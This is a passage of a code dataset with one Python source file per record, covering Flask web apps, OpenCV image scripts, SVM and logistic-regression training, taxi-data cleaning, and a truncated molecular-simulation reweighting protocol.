render_template('9-states.html', states=new_dict)\n\n\n@app.route('/states/<id>')\ndef states_id(id):\n    \"\"\"display a HTML page\"\"\"\n    new_dict = storage.all(State)\n    if \"State.\" + id in new_dict:\n        for key, value in new_dict.items():\n            if id in key:\n                name = value.name\n                city_dict = value.cities\n    else:\n        return render_template('9-states.html', els=True)\n    return render_template('9-states.html', cities=city_dict,\n                           id=id, name=name)\n\n\n@app.teardown_appcontext\ndef teardown_db(exception):\n    \"\"\"Remove the current SQLAlchemy Session\"\"\"\n    storage.close()\n\nif __name__ == \"__main__\":\n    app.run(host='0.0.0.0', port='5000')\n","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"368534808","text":"from models.user import User\nfrom flask import Response\nfrom flask_restful import Resource, reqparse, request\nfrom security.jwt_initialize import jwt_required, get_jwt_identity\nfrom services.user import UserService\nfrom flask_mongoengine import DoesNotExist\n\nclass UserController(Resource):\n\n    @jwt_required\n    def get(self):\n        args = request.args\n        print(args)\n        username = request.args.get('username')\n        try:\n            if username:\n                users = UserService.buscar_por_username(username)\n            else:\n                users = UserService.buscar_todos()\n            return Response(users, mimetype=\"application/json\", status=200)\n        except DoesNotExist:\n            return {'message': 'User not found'}, 404","sub_path":"backend/resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"212437565","text":"\"\"\"\r\n    Python program to analyze an image using Histogram\r\n\"\"\"\r\n\r\n# importing required libraries of opencv\r\nimport cv2\r\n\r\n# importing library for plotting\r\nfrom matplotlib import pyplot as plt\r\n\r\n# reads an input image\r\nimg = cv2.imread(\"../images/1.jpeg\", 0)\r\nimg1 = cv2.imread(\"../images/2.jpeg\")\r\nimg2 = cv2.imread(\"../images/3.jpeg\")\r\nimg3 = cv2.imread(\"../images/1bit.png\")\r\n\r\n# find frequency of pixels in range 0-255\r\nhistr = cv2.calcHist([img], [0], None, [256], [0, 256])\r\n# histr1 = cv2.calcHist([img1], [0], None, [256], [0, 256])\r\n# histr2 = cv2.calcHist([img2], [0], None, [256], [0, 256])\r\n# histr3 = cv2.calcHist([img3], [0], None, [256], [0, 256])\r\n\r\n# show the plotting graph of an image\r\nplt.plot(histr)\r\n# plt.plot(histr1)\r\n# plt.plot(histr2)\r\n# plt.plot(histr3)\r\n\r\n# alternative way to find histogram of an image\r\nplt.hist(img.ravel(), 256, [0, 256])\r\n\r\nplt.show()","sub_path":"Image_Processing/Analyze_an_image_using_Histogram.py","file_name":"Analyze_an_image_using_Histogram.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"544879536","text":"result=0\nsum=0\nstart=0\nN,M = [int(x) for x in input().split()]\ndata = [int(x) for x in input().split()]\nfor x in data:\n    sum=sum+x\n    if sum>=M:\n        while sum>=M :\n            if sum == M:\n                result=result+1\n            sum = sum - data[start]\n            start = start + 1\n\nprint (result)\n","sub_path":"Algorithm/Back_2003.py","file_name":"Back_2003.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"602455431","text":"import os\nimport sys\nimport argparse\nfrom copy 
import copy\nsys.path.insert(0,os.path.abspath(os.path.join(sys.path[0],\"..\")))\nfrom live.Logistic_live import Logistic_online\n\nif __name__ == '__main__':\n desc = 'the logistic regression model'\n parser = argparse.ArgumentParser(description=desc)\n\n #script parameters\n parser.add_argument('-o', '--action', type=str,\n help='action that we wish to take, has potential values of : train, test, tune',\n default='train'\n )\n\n #result parameters\n parser.add_argument('-s','--horizon',type=int,\n help='the prediction horizon',\n default=5\n )\n parser.add_argument('-gt', '--ground_truth', type=str, \n help='the name of the column that we are predicting either value or direction',\n default=\"LME_Co_Spot\"\n )\n parser.add_argument('-sou','--source', type = str, \n help='source of data', \n default = \"NExT\"\n )\n parser.add_argument('-v','--version', type = str, \n help='feature version for data', \n default = 'v10'\n )\n parser.add_argument('-d', '--date', type=str,\n help = \"string of comma-separated dates which identify the total period of deployment by half-years\"\n )\n\n #hyperparameters\n parser.add_argument('-l','--lag', type=int, \n help='lag',\n default = 5\n )\n parser.add_argument('-max_iter','--max_iter',type=int,\n help='max number of iterations',\n default=100\n )\n parser.add_argument('-C', '--C', type=float,\n help = 'inverse of learning rate'\n )\n args = parser.parse_args()\n\n #initialize model\n model = Logistic_online(lag = args.lag, horizon = args.horizon, version = args.version, gt = args.ground_truth, date = args.date, source = args.source)\n \n #case if action is tune\n if args.action==\"tune\":\n model.tune(100)\n\n #case if action is train\n elif args.action=='train':\n model.train(C=args.C, max_iter=args.max_iter)\n \n #case if action is test\n else:\n final = model.test()\n","sub_path":"code/train_data_logistic.py","file_name":"train_data_logistic.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"602034021","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\nimport argparse\r\nimport svmutil\r\nimport sys,os\r\nassert(\"3.7\" in sys.version)\r\nfrom svm import *\r\nfrom sklearn.svm import LinearSVC\r\nfrom PIL import Image\r\nfrom mini_lambs import JOIN,STR_WRITE\r\nimport numpy as np\r\nimport pickle\r\nfrom svmutil import *\r\n\r\ndef run_loop(CLASSES,new_filename,class_path,NUM_CLASSES,NUM_PTS_PER_CLASS):\r\n\tf_data = open(new_filename, 'w', encoding='utf-8')\r\n\tfor chin_index,chin_char in enumerate(CLASSES):\r\n\t\tif(chin_index%5==0): \r\n\t\t\tprint(\"chin_index: {}\".format(chin_index))\r\n\t\t\tif(chin_index==NUM_CLASSES): break\r\n\t\tjpg_path = JOIN(class_path, chin_char)\r\n\t\tfor img_index,img in enumerate(os.listdir(jpg_path)):\r\n\t\t\tif(img_index%5==0):\r\n\t\t\t\tprint(\"\\timg_index: {}\".format(img_index))\r\n\t\t\t\tif(img_index==NUM_PTS_PER_CLASS): break\r\n\t\t\tNP2D = np.asarray(Image.open(JOIN(jpg_path,img)).getdata()).reshape(5670).astype(str)\r\n\t\t\twrite_data = STR_WRITE(chin_index, NP2D)\r\n\t\t\tf_data.write(write_data)\r\n\tf_data.close()\r\n\treturn\r\n\r\n#preprocess the data given filepath (train and test);\r\n# calculate accuracy percentage\r\ndef preprocess_data_svm(filepath1, filepath2, NUM_CLASSES, NUM_PTS_PER_CLASS_1, NUM_PTS_PER_CLASS_2):\r\n\tclass_path_1 = JOIN(os.getcwd(), filepath1)\r\n\tclass_path_2 = JOIN(os.getcwd(), filepath2)\r\n\tCLASSES = os.listdir(class_path_1)\r\n\ttry: 
os.mkdir(\"svm_data\")\t\r\n\texcept: print(\"Directory present - moving on...\")\r\n\tnew_filename_1 = JOIN(os.getcwd(),JOIN(\"svm_data\", filepath1[:9]+\".tr\"))\r\n\tnew_filename_2 = JOIN(os.getcwd(),JOIN(\"svm_data\", filepath2[:9]+\".te\"))\r\n\trun_loop(CLASSES,new_filename_1,class_path_1,NUM_CLASSES,NUM_PTS_PER_CLASS_1) \r\n\trun_loop(CLASSES,new_filename_2,class_path_2,NUM_CLASSES,NUM_PTS_PER_CLASS_2)\r\n\treturn\r\n\r\n##loads relevant data from filepath provided...\r\ndef train_test_X_Y(filepath1): #NOTE: data MUST be in format provided given filepath\r\n\tX_t,y_t = [],[]\r\n\twith open(filepath1, 'r', encoding='utf-8') as f:\r\n\t\tfor index,line in enumerate(f.readlines()):\r\n\t\t\tif(index%100==0): print(\"\\tindex: {}\".format(index))\r\n\t\t\ty_t.append(int(line[0]))\r\n\t\t\tX_t_new = list(filter(lambda x: \":\" in x, line[1:].strip().split(\" \")))\r\n\t\t\tX_t_new_2 = [float(line[line.index(\".\"):]) for line in X_t_new] #(extract float - leave out index...)\r\n\t\t\tX_t.append(X_t_new_2)\r\n\treturn np.asarray(X_t),np.asarray(y_t)\r\n\r\ndef sklearn_libsvm_wrapper(X_train,y_train,X_test,y_test):\r\n\tdef SKLEARN_SVM(X_train,y_train,X_test,y_test,penalty='l2'):\r\n\t\tclf = LinearSVC(penalty=penalty)\r\n\t\tclf.fit(X_train,y_train)\r\n\t\twith open(\"sklearn_svm.pkl\", \"wb\") as f_pkl:\r\n\t\t\tpickle.dump(clf, f_pkl)\r\n\t\tscore = clf.score(X_test, y_test)\r\n\t\tprint(\"score: {}\".format(score))\r\n\t\twith open(\"sklearn_score.txt\", \"w\") as f_score:\r\n\t\t\tf_score.write(\"score: {}\".format(score))\r\n\tdef LIBSVM_svm(X_train,y_train,X_test,y_test,C=10):\r\n\t\tprob = svm_problem(y_train,X_train)\r\n\t\tparams = svm_parameter('-s 0 -t 0 -c 5')\r\n\t\tmodel = svm_train(prob, params)\r\n\t\t_,(accr,MSE,SCC),_ = svm_predict(y_test,X_test,model)\r\n\t\tprint(\"Accuracy: {}\\nMSE: {}\\nSCC: {}\\n\".format(accr,MSE,SCC))\r\n\t\tsvm_save_model(\"chin_char.model\",model)\r\n\tLIBSVM_svm(X_train.tolist(),y_train.tolist(),X_test.tolist(),y_test.tolist())\r\n\tSKLEARN_SVM(X_train,y_train,X_test,y_test)\r\n\r\n\r\n# determine how to work w/ the training data\r\n\r\n# 100 samples/class train; 20 samples/class test\r\ndef main_shell():\r\n\tprint(\"Two SVMs: one using Sklearn and another using LIBSVM\")\r\n\tparser = argparse.ArgumentParser(description=\"\"\"Argument parser for SVM:\\n\"\"\")\r\n\tparser.add_argument('--NUM_CLASSES',type=int, default=200, help='input denoting number of classes to discern')\r\n\tparser.add_argument('--NUM_PTS_PER_CLASS_1',type=int, default=100, help='number of training pts per class [MAX=118]')\r\n\tparser.add_argument('--NUM_PTS_PER_CLASS_2',type=int,default=20, help='number of test pts per class [MAX=28]')\r\n\targs = parser.parse_args()\r\n\tif(not((\"svm_data\" in os.listdir(os.getcwd())) and (\"chin_char.tr\" in \r\n\t\tos.listdir(JOIN(os.getcwd(),\"svm_data\"))) and \r\n\t\t(\"chin_char.te\" in os.listdir(JOIN(os.getcwd(),\"svm_data\"))))): \r\n\t\tpreprocess_data_svm(\"chin_char_trn_preproc2\",\"chin_char_tst_preproc2\",\r\n\t\t\targs.NUM_CLASSES,args.NUM_PTS_PER_CLASS_1,args.NUM_PTS_PER_CLASS_2)\r\n\r\n\t#NOTE: data available in \"chin_char.tr\" and \"chin_char.te\" files respectively; \r\n\t\t# You can navigate to \"svm_data\" from CMD and run via command line, provided you setup libsvm\r\n\tX_train,y_train = train_test_X_Y(JOIN(JOIN(os.getcwd(), \"svm_data\"), \"chin_char.tr\"))\r\n\tX_test,y_test = train_test_X_Y(JOIN(JOIN(os.getcwd(), \"svm_data\"), 
\"chin_char.te\"))\r\n\tsklearn_libsvm_wrapper(X_train,y_train,X_test,y_test)\r\n\r\nmain_shell()\r\n","sub_path":"data_training_svm.py","file_name":"data_training_svm.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"8094345","text":"# -*- coding: UTF-8 -*-\n#.@FileName:AdvancedSkeleton_link\n#.@Date:2019-03-15:18:53\n#.@Aurhor:LuoOu\nimport maya.mel as mel\nimport os\n\n\ndef main(*args):\n script = os.path.realpath(__file__)\n scripts_dir = os.path.dirname(script)\n scriptsPath = scripts_dir.replace(\"RIG\", \"ScriptPackages\").replace('\\\\',r'/')\n mel.eval('source \"{}/RIG/Animate8_SetupToolWin/Animate8_SetupToolWin\"'.format(scriptsPath))\n\n\n","sub_path":"software/maya/scripts/Rig/Animate8_SetupToolWin_link.py","file_name":"Animate8_SetupToolWin_link.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"307780781","text":"import numpy as np\nimport pandas as pd\nimport datetime as dt\nimport os\n\n# todo check code is saving properly\n# todo implement percentile factor method\n\n# Use import cProfile\n#\n# import cProfile\n# pr = cProfile.Profile()\n# pr.enable()\n# your_function_call()\n# pr.disable()\n# # after your program ends\n# pr.print_stats(sort=\"calls\")\n\n# to profile each method\n\ntime_bins = [8*60*60, 10*60*60, 16*60*60, 18*60*60, 24*60*60]\ntime_cats = np.array(['Morning', 'MorningRush', 'Day', 'AfternoonRush', 'Night'])\n\n\ndef find_individual_raw_data():\n path = 'M:/GitHub/Anomaly-Detection/Individual/yellow_tripdata_2018-01.csv'\n return pd.read_csv(path)\n\n\ndef find_multiple_raw_data():\n print('Getting multiple raw data files...')\n path = 'C:/Users/medkmin/PycharmProjects/TransportData/Multiple'\n\n files = []\n for r, d, f in os.walk(path):\n for file in f:\n if '.csv' in file:\n files.append(os.path.join(r, file))\n\n column_names = ['PU_Datetime', 'DO_Datetime', 'PU_Location', 'DO_Location']\n data = pd.DataFrame()\n\n for file in files:\n\n def converter_function(value):\n if value == '':\n return -1\n return int(value)\n\n if 'fhv' in file:\n print('Reading data \"fhv\"...')\n file_data = pd.read_csv(file,\n parse_dates=[0, 1],\n infer_datetime_format=True,\n usecols=[0, 1, 2, 3],\n names=column_names,\n converters={2: converter_function, 3: converter_function},\n header=0)\n print('Data read.')\n data = pd.concat([data, clean_raw_data(file_data)], ignore_index=True)\n\n elif 'yellow' in file:\n print('Reading data \"yellow\"...')\n file_data = pd.read_csv(file,\n parse_dates=[0, 1],\n infer_datetime_format=True,\n usecols=[1, 2, 7, 8],\n names=column_names,\n converters={7: converter_function, 8: converter_function},\n header=0)\n print('Data read.')\n data = pd.concat([data, clean_raw_data(file_data)], ignore_index=True)\n\n elif 'green' in file:\n print('Reading data \"green\"...')\n file_data = pd.read_csv(file,\n parse_dates=[0, 1],\n infer_datetime_format=True,\n usecols=[1, 2, 5, 6],\n names=column_names,\n converters={5: converter_function, 6: converter_function},\n header=0)\n print('Data read.')\n data = pd.concat([data, clean_raw_data(file_data)], ignore_index=True)\n\n else:\n print('raw data error')\n\n return data\n\n\ndef clean_raw_data(data):\n print('Cleaning data...')\n\n data.dropna(inplace=True)\n data.drop_duplicates(inplace=True)\n data['JourneyTime'] = [journey_time.seconds for journey_time in (data['DO_Datetime'] - 
data['PU_Datetime'])]\n data['Link'] = [str({x, y}) for x, y in zip(data['PU_Location'], data['DO_Location'])]\n\n data['PU_Datetime'] = data['PU_Datetime'].apply(lambda x: (x - dt.datetime(x.year, x.month, x.day)).seconds)\n bins = np.digitize(data['PU_Datetime'].values, bins=time_bins)\n data['TimeCats'] = time_cats[bins]\n data = (data.drop(columns=data.columns[0:4]))\n print('Data cleaned.')\n return data\n\n\ndef calculate_average_journey_time(data):\n print('Calculating average journey time...')\n average_time = data.groupby(['Link', 'TimeCats']).mean().unstack('TimeCats')\n average_time.columns = time_cats\n print('Average journey time calculated.')\n return average_time\n\n\ndef run_congestion_factor_method(c_data, h_data, congestion_factor):\n print('Running congestion method...')\n\n# todo check values of h_data and c_data. Getting runtime errors\n\n c_data['IsCongested'] = [c_data.iloc[index, 0] >\n congestion_factor * h_data.loc[c_data.iloc[index, 1], c_data.iloc[index, 2]]\n for index in range(c_data.shape[0])]\n c_data['CongestionTime'] = [congestion_factor * h_data.loc[c_data.iloc[index, 1], c_data.iloc[index, 2]]\n for index in range(c_data.shape[0])]\n print('Congestion method complete.')\n return c_data\n\n\n# raw_data = find_individual_raw_data()\n# print(raw_data.head())\n# clean_data = clean_raw_data(raw_data.iloc[:100, :], 'yellow')\n\nclean_data = find_multiple_raw_data()\n# print(clean_data)\nhistorical_data = calculate_average_journey_time(clean_data)\n# print(historical_data)\ncongested_data = run_congestion_factor_method(clean_data, historical_data, congestion_factor=100)\nprint(congested_data[congested_data['IsCongested']])\ncongested_data.to_csv('M:/GitHub/Anomaly-Detection/PyCharmProjects')\n\n\n","sub_path":"PyCharmProjects/CleanData.py","file_name":"CleanData.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"625536067","text":"from gpquant.gp_middleware import Middleware\nimport ctypes\nfrom numpy.ctypeslib import ndpointer\nfrom gpquant.gp_dynamic import *\nfrom gpquant.gp_fitness import *\nfrom gplearn.genetic import SymbolicRegressor\nfrom gplearn.fitness import make_fitness\n\nfrom ctypes import Structure\nimport pydotplus\n\n\nclass DataPackage(Structure):\n _fields_ = [('n_data', ctypes.c_int), ('n_dim', ctypes.c_int),\n ('data', ctypes.POINTER(ctypes.POINTER(ctypes.c_double)))]\n\n\nmid = Middleware(\"GPQuant.dll\")\nget_data_func = mid.get_function(\"?get_data@BackTesting@GPQuant@@SA?AUTestDataPackage@2@XZ\")\nget_data_func.restype = DataPackage\n\nget_reward_func = mid.get_function(\"?get_reward@BackTesting@GPQuant@@SANPEAHPEAN@Z\")\nget_reward_func.restype = ctypes.c_double\n\npackage = get_data_func()\nn_dim = int(package.n_dim)\nn_data = int(package.n_data)\n\nx_data = []\nfor i in range(n_dim):\n _x_data = []\n for j in range(n_data):\n _x_data.append(package.data[i][j])\n x_data.append(_x_data)\nx_data = np.transpose(np.array(x_data))\nprint(x_data)\n\n\n#\n# class DataPackage(Structure):\n# _fields_ = [('n_data', ctypes.c_int), ('data', ctypes.POINTER(ctypes.c_double))]\n#\n#\n# mid = Middleware(\"GPQuant_struct.dll\")\n# get_data_func = mid.get_function(\"?get_data@BackTesting@gpquant@@SA?AUTestDataPackage@2@XZ\")\n# get_data_func.restype = DataPackage\n#\n#\n# package = get_data_func()\n# n_data = int(package.n_data)\n\n#\n# mid = Middleware(\"gpquant.dll\")\n# get_data_func = mid.get_function(\"?get_data@BackTesting@gpquant@@SAPEANXZ\")\n# 
get_data_func.restype = ndpointer(dtype=ctypes.c_double, shape=(10,))\n# x_data = get_data_func()\n#\n# get_reward_func = mid.get_function(\"?get_reward@BackTesting@gpquant@@SANPEAHPEAN@Z\")\n# get_reward_func.restype = ctypes.c_double\n#\n#\ndef explicit_fitness(y, y_pred, sample_weight):\n n_data = len(y)\n y = [int(_) for _ in y]\n indices = (ctypes.c_int * n_data)(*y)\n arr = (ctypes.c_double * n_data)(*y_pred)\n res = get_reward_func(indices, arr)\n # print(res)\n return res\n\n\n# metric_gp = DynamicSymbolicRegressor.make_explict_fitness(get_reward_func, y_as_fitness, False)\n\n\n# x_data = x_data.reshape(10, 1)\nest_gp = SymbolicRegressor(population_size=50,\n generations=20, stopping_criteria=0.01,\n p_crossover=0.7, p_subtree_mutation=0.1,\n p_hoist_mutation=0.05, p_point_mutation=0.1,\n metric=make_fitness(explicit_fitness, False),\n max_samples=0.9, verbose=1,\n parsimony_coefficient=0.01, random_state=0)\n_ = [i for i in range(x_data.shape[0])]\nest_gp.fit(x_data, _)\nfrom PIL import Image\n\ngraph = pydotplus.graphviz.graph_from_dot_data(est_gp._program.export_graphviz())\ngraph.write_png(\"tree.png\")\n# print([method for method in dir(graph) if callable(getattr(graph, method))])\n# Image.open(graph.create_png())\n","sub_path":"gpquant/tests/test_gpquant.py","file_name":"test_gpquant.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"395951117","text":"class Node:\n def __init__(self,value):\n self.data = value\n self.next = None\n def add(self,value):\n curNode = self\n while curNode.next:\n curNode = curNode.next\n curNode.next = Node(value)\n def __repr__(self):\n curNode = self\n build = []\n while curNode:\n build.append(str(curNode.data))\n curNode = curNode.next\n return '->'.join(build)\n def toList(self):\n curNode = self\n out = []\n while curNode:\n out.append(curNode.data)\n curNode = curNode.next\n return out\n\ndef removeDupe(lst):\n first = lst\n while first:\n second = first\n while second.next:\n if second.next.data == first.data:\n second.next = second.next.next\n else:\n second = second.next\n first = first.next\n\nb = Node(1)\nb.add(1)\nb.add(1)\nb.add(1)\nb.add(1)\nb.add(3)\nb.add(4)\nb.add(1)\nb.add(1)\nb.add(1)\nb.add(2)\nremoveDupe(b)\nassert b.toList() == [1,3,4,2]","sub_path":"2.1.py","file_name":"2.1.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"324876526","text":"\"\"\"Replicated Function Remover.\"\"\"\n# pylint: disable=unused-argument\nimport json\nimport logging\nfrom typing import Any, Dict, Optional, Union # pylint: disable=unused-import\n\nfrom runway.cfngin.context import Context # pylint: disable=unused-import\nfrom runway.cfngin.providers.base import BaseProvider # pylint: disable=W\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef execute(\n context, # type: Context # pylint: disable=unused-argument\n provider, # type: BaseProvider\n **kwargs # type: Optional[Dict[str, Any]]\n):\n # type: (...) -> Union[Dict[str, Any], bool]\n \"\"\"Execute the cleanup process.\n\n A StateMachine will be executed that stays active after the main and\n dependency stacks have been deleted. This will keep attempting to\n delete the Replicated functions that were created as part of the main\n stack. 
Once it has deleted all the Lambdas supplied it will self\n destruct its own stack.\n\n Args:\n context (:class:`runway.cfngin.context.Context`): The context\n instance.\n provider (:class:`runway.cfngin.providers.base.BaseProvider`):\n The provider instance.\n\n Keyword Args:\n function_arns (List[str]): The arns of all the Replicated functions to\n delete.\n state_machine_arn (str): The ARN of the State Machine to execute.\n stack_name (str): The name of the Cleanup stack to delete.\n\n \"\"\"\n session = context.get_session()\n step_functions_client = session.client(\"stepfunctions\")\n\n try:\n step_functions_client.start_execution(\n stateMachineArn=kwargs[\"state_machine_arn\"],\n input=json.dumps(\n {\n \"SelfDestruct\": {\n \"StateMachineArn\": kwargs[\"state_machine_arn\"],\n \"StackName\": kwargs[\"stack_name\"],\n },\n \"FunctionArns\": kwargs[\"function_arns\"],\n }\n ),\n )\n return True\n except Exception: # pylint: disable=broad-except\n LOGGER.exception(\"could not complete cleanup\")\n return False\n","sub_path":"runway/hooks/staticsite/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"603175601","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base,Restaurant,MenuItem\nengine = create_engine('sqlite:///restaurantmenu.db')\nBase.metadata.bind = engine\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\nupdateRestaurant = session.query(Restaurant).filter_by(id=1).one()\nupdateRestaurant.name='Khan and Singh'\nsession.add(updateRestaurant)\nsession.commit()","sub_path":"vagrant/restaurant/update_tables.py","file_name":"update_tables.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"6930126","text":"import cv2\nimport numpy as np\nfrom collections import OrderedDict\nimport tracker as tracker\n\nclass Colores:\n\tblue_lower = np.array([100,100,23], np.uint8)\n\tblue_upper = np.array([125,255,255], np.uint8)\n\n#\tyellow_lower = np.array([15,100,20], np.uint8)\n#\tyellow_upper = np.array([45,255, 255], np.uint8)\n\n\tyellow_lower = np.array([20, 100, 100])\n\tyellow_upper = np.array([30, 255, 255])\n\n\tred1_lower = np.array([0,100,20], np.uint8)\n\tred1_upper = np.array([5,255,255], np.uint8)\n\n\tred2_lower = np.array([175,100,20], np.uint8)\n\tred2_upper = np.array([179,255,255], np.uint8)\n\n\tgreenLower = (29, 86, 6)\n\tgreenUpper = (64, 255, 255)\n\n\tcolores = ['blue', 'yellow', 'red']\n\tmasks = [0, 0, 0]\n\ttotal = [0, 0, 0]\n\tborder_colors = [(255,0,0), (0,255,255), (0,0,255)]\n\n\tdef __init__(self):\n\t\tself.cap = cv2.VideoCapture(0)\n\t\tself.frame = None\n\t\tself.tracker = tracker.Tracker()\n\n\tdef start(self):\n\t\twhile True:\n\t\t\tret, self.frame = self.cap.read()\n\t\t\tself.frame = cv2.flip(self.frame, cv2.ROTATE_90_CLOCKWISE) # Rota la imagen 90 degrees\n\n\t\t\tself.rects = []\n\t\t\tframeHSV = self.setHSVColorModel()\n\t\t\tself.maskFrame(frameHSV)\n\t\t\tself.dibujarContornos()\n\t\t\tself.tracker.update(self.rects)\n\t\t\tself.total = self.tracker.setTrackeableObjects(self.total)\n\t\t\tself.markObjects()\n\t\t\tself.showResults()\n\n\t\t\tif ret == True:\n\t\t\t\tcv2.imshow('Frame', self.frame)\n\n\t\t\tif cv2.waitKey(1) & 0xFF == ord('s'):\n\t\t\t\tbreak\n\n\t\tself.destroy()\n\n\tdef markObjects(self):\n\t\tfor (objectID, coords) in 
self.tracker.getObjects():\n\t\t\ttext = \"ID {}\".format(objectID)\n\t\t\tcv2.putText(self.frame, text, (coords[1] + 10, coords[2]),\n\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n\t\t\tself.dibujarPunto(coords[1], coords[2])\n\n\tdef showResults(self):\n\t\tfor i in range(len(self.colores)):\n\t\t\ttext = \"{}: {}\".format(self.colores[i], self.total[i])\n\t\t\tcv2.putText(self.frame, text, (10, ((i * 20) + 20)),\n\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 2)\n\n\tdef setHSVColorModel(self):\n\t\treturn cv2.cvtColor(self.frame, cv2.COLOR_BGR2HSV)\n\n\tdef maskFrame(self, frameHSV):\n\t\tself.masks[0] = cv2.inRange(frameHSV, self.blue_lower, self.blue_upper)\n\t\tself.masks[1] = cv2.inRange(frameHSV, self.yellow_lower, self.yellow_upper)\n\t\tself.masks[2] = cv2.add(\n\t\t\t\tcv2.inRange(frameHSV, self.red1_lower, self.red1_upper),\n\t\t\t\tcv2.inRange(frameHSV, self.red2_lower, self.red2_upper)\n\t\t\t)\n\n\tdef dibujarContornos(self):\n\t\tfor mask in range(len(self.masks)):\n\t\t\t(_,contornos,hierarchy) = cv2.findContours(self.masks[mask], cv2.RETR_EXTERNAL,\n\t\t\t\tcv2.CHAIN_APPROX_SIMPLE)\n\t\t\tfor pic, contour in enumerate(contornos):\n\t\t\t\tif (cv2.contourArea(contour) > 600):\n\t\t\t\t\tx,y,w,h = cv2.boundingRect(contour)\n\t\t\t\t\tcv2.rectangle(self.frame,(x,y),(x+w,y+h), self.border_colors[mask], 3)\n\t\t\t\t\tcv2.putText(self.frame, '{},{}'.format(x, y), (x+10, y),\n\t\t\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.75, [255,255,0], 1, cv2.LINE_AA)\n\t\t\t\t\tself.rects.append((mask, x, y, w, h))\n\n\tdef dibujarLinea(self):\n\t\tcv2.line(self.frame, (0 , 230), (640 , 230), (100,155,30), 3)\n\n\tdef dibujarPunto(self, x, y):\n\t\tcv2.circle(self.frame, (x,y), 7, (0, 255, 0), -1)\n\n\tdef destroy(self):\n\t\tself.cap.release()\n\t\tcv2.destroyAllWindows()\n","sub_path":"colores.py","file_name":"colores.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"649466056","text":"\"\"\"\nA collection of protocols for reweighting cached simulation data.\n\"\"\"\nimport copy\nimport logging\nimport re\nfrom os import path\n\nimport numpy as np\nimport typing\nfrom simtk import openmm\nfrom simtk.openmm import app\n\nfrom propertyestimator import unit\nfrom propertyestimator.forcefield import ForceFieldSource, SmirnoffForceFieldSource\nfrom propertyestimator.properties.properties import ParameterGradientKey, ParameterGradient\nfrom propertyestimator.substances import Substance\nfrom propertyestimator.thermodynamics import ThermodynamicState\nfrom propertyestimator.utils.exceptions import PropertyEstimatorException\nfrom propertyestimator.utils.openmm import pint_quantity_to_openmm, setup_platform_with_resources, \\n    openmm_quantity_to_pint, disable_pbc\nfrom propertyestimator.utils.quantities import EstimatedQuantity\nfrom propertyestimator.utils.statistics import StatisticsArray, ObservableType\nfrom propertyestimator.workflow.decorators import protocol_input, protocol_output, UNDEFINED\nfrom propertyestimator.workflow.plugins import register_calculation_protocol\nfrom propertyestimator.workflow.protocols import BaseProtocol\n\n\n@register_calculation_protocol()\nclass GradientReducedPotentials(BaseProtocol):\n    \"\"\"A protocol to estimate the reduced potential of the configurations\n    of a trajectory using reverse and forward perturbed simulation parameters for\n    use with estimating reweighted gradients using the central difference method.\n    \"\"\"\n\n    
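# Editor's note: a minimal sketch, not part of the original protocol, of the\n    # central-difference estimate these reverse/forward reduced potentials feed,\n    # assuming a hypothetical observable A evaluated at the perturbed parameter\n    # values p * (1 - s) and p * (1 + s):\n    #\n    #     def central_difference(a_reverse, a_forward, p_reverse, p_forward):\n    #         # dA/dp ~= (A(p_forward) - A(p_reverse)) / (p_forward - p_reverse)\n    #         return (a_forward - a_reverse) / (p_forward - p_reverse)\n\n    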
reference_force_field_paths = protocol_input(\n        docstring='A list of paths to the force field files which were '\n                  'originally used to generate the configurations.',\n        type_hint=list,\n        default_value=UNDEFINED\n    )\n    force_field_path = protocol_input(\n        docstring='The path to the force field which contains the parameters to '\n                  'differentiate the observable with respect to.',\n        type_hint=str,\n        default_value=UNDEFINED\n    )\n\n    reference_statistics_path = protocol_input(\n        docstring='An optional path to the statistics array which was '\n                  'generated alongside the observable of interest, which will '\n                  'be used to correct the potential energies at the reverse '\n                  'and forward states. This is only really needed when the '\n                  'observable of interest is an energy.',\n        type_hint=str,\n        default_value=UNDEFINED,\n        optional=True\n    )\n\n    enable_pbc = protocol_input(\n        docstring='If true, periodic boundary conditions will be enabled when '\n                  're-evaluating the reduced potentials.',\n        type_hint=bool,\n        default_value=True\n    )\n\n    substance = protocol_input(\n        docstring='The substance which describes the composition of the system.',\n        type_hint=Substance,\n        